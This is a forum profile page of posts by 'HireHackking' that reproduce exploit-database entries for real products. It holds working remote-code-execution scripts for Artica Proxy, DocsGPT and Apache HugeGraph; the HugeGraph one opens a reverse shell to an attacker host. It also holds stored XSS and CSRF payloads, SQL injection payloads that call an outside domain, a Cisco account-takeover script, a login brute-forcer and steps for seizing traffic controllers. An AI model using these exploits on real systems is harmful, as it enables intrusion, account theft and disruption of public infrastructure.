Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Artica Proxy 4.50 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE) # Date: 23-04-2024 # Exploit Author: Madan # Vendor Homepage: https://artica-proxy.com/ # Version: 4.40, 4.50 # Tested on: [relevant os] # CVE : CVE-2024-2054 you can also find the exploit on my github repo: https://github.com/Madan301/CVE-2024-2054 import requests import base64 import urllib3 from colorama import Fore print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might sometimes vary from how artica proxy interface is hosted") URL = input("Enter url: ") if URL[-1]=="/": ACTUAL_URL = URL[:-1] else: ACTUAL_URL = URL ARTICA_URL = ACTUAL_URL def check(ARTICA_URL): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False) except Exception as e: print(Fore.RED+"Could not reach, check URL") if check.status_code==200: print(Fore.GREEN+"Vulnerable") return True else: print(Fore.RED+"Not Vulnerable") def exploit(ARTICA_URL): payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode() payload_data = { "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": { "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php", "cache_serializer": "json", "cache_size": 999999999, "cache_data": { payload: { "cache_date": 0, "ttl": 999999999 } } } } while True: PAYLOAD_CMD = input("enter command: ") url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}" urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) response = requests.get(url, verify=False) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if response.status_code == 200: cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}" cmd_response = requests.get(cmd_url, verify=False) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print(cmd_response.text) else: print("Failed to execute the payload") check = check(ARTICA_URL=ACTUAL_URL) if check==True: exploit(ARTICA_URL=ARTICA_URL)
  2. HireHackking

    DocsGPT 0.12.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DocsGPT 0.12.0 - Remote Code Execution # Date: 09/04/2025 # Exploit Author: Shreyas Malhotra (OSMSEC) # Vendor Homepage: https://github.com/arc53/docsgpt # Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip # Version: 0.8.1 through 0.12.0 # Tested on: Debian Linux/Ubuntu Linux/Kali Linux # CVE: CVE-2025-0868 import requests # TARGET CONFIG TARGET = "http://10.0.2.15:7091" # Change this # Malicious payload string - carefully escaped - modify the python code if necessary malicious_data = ( 'user=1&source=reddit&name=other&data={"source":"reddit",' '"client_id":"1111","client_secret":1111,"user_agent":"111",' '"search_queries":[""],"number_posts":10,' '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}' ) headers = { "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data) print(f"[+] Status Code: {response.status_code}") print("[+] Response Body:") print(response.text) except Exception as e: print(f"[-] Error sending request: {e}")
  3. HireHackking

    Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://hugegraph.apache.org/docs/download/download/ # Version: Apache HugeGraph 1.0.0 - 1.2.0 # CVE : CVE-2024–27348 from requests import Request, Session import sys import json def title(): print(''' ______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ ) | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) | \____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/ [+] Reverse shell Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py ''') def exploit(url, lhost, lport): payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} headers = { 'Content-Type': 'application/json'} s = Session() url = url + "/gremlin" req = Request('POST', url, json=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) print(prepped.headers) print(url) print(resp.headers) print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
  4. HireHackking

    Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://anchorcms.com/ # Software Link: https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip # Version: latest # Tested on: MacOS # Log in to Anchor CMS. # Click on "Create New Post". # Fill in the "Title" and enter the following payload in the field immediately below: # "><script>alert()</script> # Go to the homepage, and you will see the alert! ### PoC Request ### POST /anchor/admin/posts/edit/2 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 278 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/anchor/admin/posts/edit/2 Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta; anchorcms=hlko7b1dbdpjgn58himf2obht5 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
  5. HireHackking

    Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of Privilege Vulnerability # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/ad-manager/ # Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409 # Version: ADManager Plus Build < 7210 # Tested against: Build 7203 # CVE: CVE-2024-24409 # Description The Modify Computers is a predefined role in ADManager for managing computers. If a technician user has the Modify Computers privilege over a computer can change the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer object. In this way, the technician user can set Constrained Kerberos Delegation over any computer within the Organizational Unit that the user was delegated. Contrary to what ADManager claims the user who has the Modify Computers role can change the privilege of computer objects in the Active Directory. The Constrained Kerberos Delegation can be set for any service such as CIFS, LDAP, HOST services. Then the user can access these services by abusing the Constrained Kerberos Delegation. In addition, the Unconstrained Kerberos Delegation can be set over the computer objects by changing the userAccountControl attribute. Normally, only users that have SeEnableDelegationPrivilege privilege can set constrained kerberos delegation. Only members of the BUILTIN\Administrators group have this privilege by default. The delegated user for an Organizational Unit can not set constrained kerberos delegation even if a user has the GenericAll right over a computer account, so the delegation process in Active Directory does not grant this privilege. However, the technician user can use the SeEnableDelegationPrivilege right via the Modify Computers role. # Vulnerability reasons 1. ADMP Web App Authorization issue: Assigning a predefined Modify Computers role delegates the technician user to modify custom attributes of computers unexpectedly. Even though it appears that this privilege is not granted in the UI, the Additional Custom Attribute property is assigned and this leads to broken access control vulnerability. 2. There is no restriction for editing the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP application performs changes with domain admin privileges as designed so that if we can bypass some restrictions (e.g. format of attribute value), our requests are applied with domain admin privileges. This way we can edit the attributes userAccountControl and msDS-AllowedToDelegateTo. # Impact A technician user elevates privileges from Domain User to Domain Admin. For example, the user can set Constrained Kerberos Delegation over CLIENT1$ for the CIFS service of the domain controller and access the CIFS service. As a result, the user is delegated to manage CLIENT1$ but he can access the CIFS service of the domain controller impersonating a user unexpectedly. # Proof Of Concept https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
  6. HireHackking

    Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 07/09/2024 # Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com # Vendor Homepage: https://www.q-free.com # Software Link: N/A # Version: 1.9 # Tested on: (Intelight x-1) Linux 3.14.57 # CVE : CVE-2024-38944 ## Vulnerability Description This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection, modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion. ## Steps to Reproduce Navigate to the IP address of an identified controller When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.
  7. HireHackking

    ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) # Date: 8-7-2024 # Category: Web Application # Exploit Author: Jeremia Geraldi Sihombing # Version: 2.10.1 # Tested on: Windows # CVE: CVE-2024-39143 Description: ---------------- A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered.. Steps to reproduce ------------------------- 1. Login as a low privilege user with property edit capability. 2. Create or Edit one of the user owned property (We can user the default property owned by the user). 3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not. Vulnerable parameter name: property[property_description][content] Example Payload: <img src="x" onerror="alert(document.cookie)"> 4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account. Burp Request ------------------- POST /en/user/property/7/edit HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://localhost Connection: keep-alive Referer: http://localhost/en/user/property/7/edit Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=1 property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
  8. HireHackking

    Feng Office 3.11.1.2 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Feng Office 3.11.1.2 - SQL Injection # Date: 7/2024 # Exploit Author: Andrey Stoykov # Version: 3.11.1.2 # Tested on: Ubuntu 22.04 # Blog: http://msecureltd.blogspot.com SQL Injection: 1. Login to application 2. Click on "Workspaces" 3. Copy full URL 4. Paste the HTTP GET request into text file 5. Set the injection point to be in the "dim" parameter value 6. Use SQLMap to automate the process sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim = --fingerprint [...] [12:13:03] [INFO] confirming MySQL [12:13:04] [INFO] the back-end DBMS is MySQL [12:13:04] [INFO] actively fingerprinting MySQL [12:13:05] [INFO] executing MySQL comment injection fingerprint web application technology: Apache back-end DBMS: active fingerprint: MySQL >=3D 5.7 comment injection fingerprint: MySQL 5.7.37 [...]
  9. HireHackking

    PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) # Date: 2024-07-01 # Exploit Author: Vuln Seeker Cybersecurity Team # Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/ # Version: <= 1.0.5 # Tested on: Firefox # Contact me: vulns@vulnseeker.org The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. Proof of concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:10003 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1093 Origin: http://localhost:10003 Sec-GPC: 1 Connection: close Cookie: Cookie action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1 CSRF Exploit: <html> <body> <form action="http://localhost:10003/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="pzfm_upload_avatar" /> <input type="hidden" name="imageData" value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg==" /> <input type="hidden" name="userID" value="1"" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> Profile picture of user 1 will be changed in the dashboard http://localhost:10003/dashboard/?dashboard=profile Reference: https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
  10. HireHackking

    ChurchCRM 5.9.1 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ChurchCRM 5.9.1 - SQL Injection # Author: Sanan Qasimzada # Date: 06.07.2024 # Vendor: http://churchcrm.io/ # Software: https://github.com/ChurchRM/CRM # Reference: https://portswigger.net/web-security/sql-injection # Description: In the manual insertion point 1 - parameter `EID` appears to be vulnerable to SQL injection attacks. No need for cookies, no need admin authentication and etc. The attacker easily can steal information from this system by using this vulnerability. STATUS: HIGH Vulnerability - CRITICAL [+]Payload: ```mysql --- Parameter: EID (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) OR NOT 2407=2407 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX) Type: UNION query Title: MySQL UNION query (UTF8) - 11 columns Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) UNION ALL SELECT 'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'# --- ``` # Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1 ) # Proof and Exploit: [href](https://streamable.com/1eqhw2) # Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  11. HireHackking

    Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover # Google Dork: N/A # Date: 21/07/2024 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.cisco.com # Software Link: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html # Version: 8-202206 and earlier # Tested on: Kali Linux # CVE : CVE-2024-20419 # Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy # Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419 import requests, sys from urllib.parse import unquote # Suppress SSL warnings requests.packages.urllib3.disable_warnings() Domain = sys.argv[1] # Domain, https://0xpolar.com:8443 Username = sys.argv[2] # Username, by default its [admin] password = "Polar@123456780" print("[*] Cisco Smart Software Manager On-Prem") print("[*] Account Takeover Exploit") print("[*] Target: "+Domain) print("[*] Username: "+Username) print("\n") print("[*] Getting Necessary Tokens..") get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar" response = requests.get(get_url, verify=False) def get_cookie_value(headers, cookie_name): cookies = headers.get('Set-Cookie', '').split(',') for cookie in cookies: if cookie_name in cookie: parts = cookie.split(';') for part in parts: if cookie_name in part: return part.split('=')[1].strip() return None set_cookie_headers = response.headers.get('Set-Cookie', '') xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN') lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session') if xsrf_token: xsrf_token = unquote(xsrf_token) if not lic_engine_session or not xsrf_token: print("Required cookies not found in the response.") else: print("[+] lic_engine_session: "+lic_engine_session) print("[+] xsrf_token: "+xsrf_token) print("\n[*] Generating Auth Token") post_url = Domain+"/backend/reset_password/generate_code" headers = { 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Xsrf-Token': xsrf_token, 'Sec-Ch-Ua': '', 'Sec-Ch-Ua-Mobile': '?0', } cookies = { '_lic_engine_session': lic_engine_session, 'XSRF-TOKEN': xsrf_token, } payload = { 'uid': Username } post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False) post_response_json = post_response.json() auth_token = post_response_json.get('auth_token') if not auth_token: print("auth_token not found in the response.") else: print("[+] Auth Token: "+auth_token) print("\n[*] Setting Up a New Password") final_post_url = Domain+"/backend/reset_password" final_headers = { 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Xsrf-Token': xsrf_token, } final_cookies = { '_lic_engine_session': lic_engine_session, 'XSRF-TOKEN': xsrf_token, } final_payload = { 'uid': Username, 'auth_token': auth_token, 'password': password, 'password_confirmation': password, 'common_name': '' } final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False) response_text = final_post_response.text if "OK" in response_text: print("[+] Password Successfully Changed!") print("[+] Username: "+Username) print("[+] New Password: "+password) else: print("[!] Something Went Wrong") print(response_text)
  12. HireHackking

    Centron 19.04 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title : Centron 19.04 - Remote Code Execution (RCE) # Tested on Centreon API 19.04.0 # Centreon 19.04 - Login Password Bruteforcer # Written on 6 Nov 2019 # Referencing API Authentication of the Centreon API document # Author: st4rry # centbruteon.py # Centreon Download Link: https://download.centreon.com/#version-Older # Dependencies: sys, requests, argparse, termcolor, os #!/usr/bin/env python3 import sys import requests import argparse from termcolor import colored import os def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', dest='host', help='Define your target URL', required=True) parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80) parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP') parser.add_argument('-l', dest='username', help='Specific username') parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist') parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True) parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification') parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle') if len(sys.argv) == 1: parser.print_help(sys.stderr) sys.exit(1) args = parser.parse_args() protocol = 'https' if args.https else 'http' server = f"{protocol}://{args.host}:{args.port}" user = args.username passfile = args.passwfile.read().splitlines() userfile = args.userfile dirlo = '/centreon/api/index.php?action=authenticate' verify_ssl = not args.insecure if args.ca_bundle: verify_ssl = args.ca_bundle if user: brute_force_single_user(server, user, passfile, dirlo, verify_ssl) elif userfile: usrwl = userfile.read().splitlines() brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl) else: print(colored('Something went wrong!', 'red')) sys.exit(1) def brute_force_single_user(server, user, passfile, dirlo, verify_ssl): for password in passfile: data = {'username': user, 'password': password} r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) try: print('Processing...') print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(user, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow')) if r.status_code == 200: print(colored('Credentials found: username: ', 'green') + colored(user, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green')) print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) print('\n') break else: print(colored('403 - Unauthenticated!', 'red')) except IndexError: print(colored('Something went wrong', 'red')) def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl): for usr in usrwl: for password in passfile: data = {'username': usr, 'password': password} r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) try: print('Processing...') print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(usr, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow')) if r.status_code == 200: print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green')) print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) print('\n') else: print(colored('403 - Unauthenticated!', 'red')) except IndexError: print(colored('Something went wrong', 'red')) if __name__ == '__main__': main()
  13. HireHackking

    K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)

    HireHackking posted a blog entry in Hacker Technology
